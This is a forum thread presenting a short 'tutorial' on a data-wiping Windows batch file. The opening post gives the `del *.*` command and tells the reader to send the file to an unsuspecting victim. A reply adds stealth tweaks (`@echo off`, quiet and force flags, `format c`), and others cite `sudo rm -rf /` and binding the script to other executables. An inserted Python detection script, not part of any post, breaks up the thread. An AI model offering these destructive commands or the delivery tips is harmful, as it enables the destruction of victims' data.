6 Character Batch Virus - Simple but VERY Powerful

CircuitX's Avatar
Go4Expert Member
This is a very short tutorial describing how to make a very simple batch virus which consists of only 6 characters.

This virus will delete every file with any file extension.

Here's the code:
Quote:
del *.*
3 Easy Steps to Turn It Into a Virus
1) Type that into Notepad.
2) Save the file as a ".bat".
3) Send it.

As the unsuspecting victim opens the file, his whole hard-drive will be erased.

PLEASE DO NOT ACTUALLY DO THIS. THIS IS FOR EDUCATION ONLY.

DISCLAIMER: I will not be held responsible for the actions of people who read this tutorial. This tutorial is for educational purposes ONLY and does not in any way encourage illegal activity.
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
I would say 7 characters. space is a character
0
CircuitX's Avatar
Go4Expert Member
Quote:
Originally Posted by shabbir View Post
I would say 7 characters. space is a character
Fair enough.

But I prefer to think of it as six.
0
fourthdimension's Avatar, Join Date: Jan 2009
Ambitious contributor
Quote:
Originally Posted by CircuitX View Post
This is a very short tutorial describing how to make a very simple batch virus which consists of only 6 characters.

This virus will delete every file with any file extension.

Here's the code:


3 Easy Steps to Turn It Into a Virus
1) Type that into Notepad.
2) Save the file as a ".bat".
3) Send it.

As the unsuspecting victim opens the file, his whole hard-drive will be erased.

PLEASE DO NOT ACTUALLY DO THIS. THIS IS FOR EDUCATION ONLY.

DISCLAIMER: I will not be held responsible for the actions of people who read this tutorial. This tutorial is for educational purposes ONLY and does not in any way encourage illegal activity.
Nice. Although depending on how he runs it, it might only clean out the current directory. Also adding force and quiet flags as well as @echo off might make him a bit less suspicious... most users wouldn't answer affirmative to a prompt like "C:\Users\<their user>\*.*, Are you sure (Y/N)?". Of course, for a few extra characters, you can just format c.
Good post, though. It demonstrates just how easy it is to write a virus for Windows.

As a side note... it's funny how a disclaimer can take up more space than its code. lol

Last edited by fourthdimension; 4Feb2009 at 12:15..
0
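A defender-side check for the pattern discussed in this thread, as an added example that is not part of any post: a Python scanner that flags batch scripts containing a wildcard-only `del`/`erase` or a drive `format`, and raises severity when `@echo off` or any switch is present. The rule names, severities and sample input are assumptions made for illustration.

```python
import re

# Added example: rule names and severities are assumptions, not a vendor signature set.
COMMAND = re.compile(r'@?\s*([a-z]+)(.*)', re.IGNORECASE)

def is_wildcard_only(target):
    """True for targets such as *.* or C:\\dir\\*.* whose last component is all wildcards."""
    leaf = target.strip('"').rsplit('\\', 1)[-1]
    return '*' in leaf and set(leaf) <= set('*?.')

def scan_batch(text):
    """Return (line_number, rule, severity) for destructive commands in a batch script."""
    findings = []
    echo_off = False  # command echo hidden, so the user sees less of what runs
    for lineno, line in enumerate(text.splitlines(), 1):
        for cmd in re.split(r'[&|]+', line):  # several commands can share one line
            m = COMMAND.match(cmd.strip())
            if not m:
                continue
            name, args = m.group(1).lower(), m.group(2).split()
            switches = [a for a in args if a.startswith('/')]
            targets = [a for a in args if not a.startswith('/')]
            if name == 'echo' and [a.lower() for a in args] == ['off']:
                echo_off = True
            elif name in ('del', 'erase') and any(map(is_wildcard_only, targets)):
                # A switch or hidden command echo gives the user less to notice.
                severity = 'high' if switches or echo_off else 'medium'
                findings.append((lineno, 'wildcard-delete', severity))
            elif name == 'format' and any(re.fullmatch(r'[a-z]:', t, re.I) for t in targets):
                findings.append((lineno, 'format-drive', 'high'))
    return findings

# Constructed sample input, not a file taken from the thread.
SAMPLE = "@echo off\nrem cleanup\ndel *.*\ndel notes.txt\n"

if __name__ == '__main__':
    for finding in scan_batch(SAMPLE):
        print(finding)
```

A scanner like this fits a mail gateway or upload filter that already blocks or quarantines `.bat` attachments; it reads the script as text and never executes it.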
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Quote:
Originally Posted by fourthdimension View Post
As a side note... it's funny how a disclaimer can take up more space than its code. lol
0
xpi0t0s's Avatar, Join Date: Aug 2004
Mentor
Not a virus, because one of the features of a virus is that it self-replicates. This is just a delete command, and it doesn't show "how easy it is to write a virus for Windows" - if that's the case, then "rm *" is a 3 character "virus" for Linux, or "sudo rm -rf /" for a more powerful 10 character variant.

http://en.wikipedia.org/wiki/Computer_virus
0
fourthdimension's Avatar, Join Date: Jan 2009
Ambitious contributor
That depends on how you define a virus. Worms have to self-replicate, but many people do not consider that functionality necessary for viruses (including the authors of many security-focused books). All a virus really is is a process that runs without the user's approval or knowledge. Besides, code like this would have no problems replicating if you bind it to another executable and start seeding it. So maybe this would be considered more of a trojan than a virus (while it could be considered both), but it doesn't make too much difference in this case.
Also, there's a big difference between those commands. Sure, they're just delete commands; in reality, what are viruses and malware in general? Just a collection of "just <whatever>" commands that are intended to be run unknowingly, written by authors with malicious intent. The Windows command can be bound to anything, so something simple like just opening a picture could erase your hard drive. On Linux, a command like that cannot operate unless you first chmod it and then enter your administrator password. If it's run in a terminal, they'd be able to see the command and either not enter the password or Ctrl-C it, and if not, you'd want to use gksudo, not sudo... which would also raise red flags since the average Linux user tends to be more aware of how his OS works than the average Windows user, and he'd know that if he hadn't entered any commands needing super user privilege there's no reason the system would need his password. There's no point in trying to classify something as a virus if it has no chance of ever being run.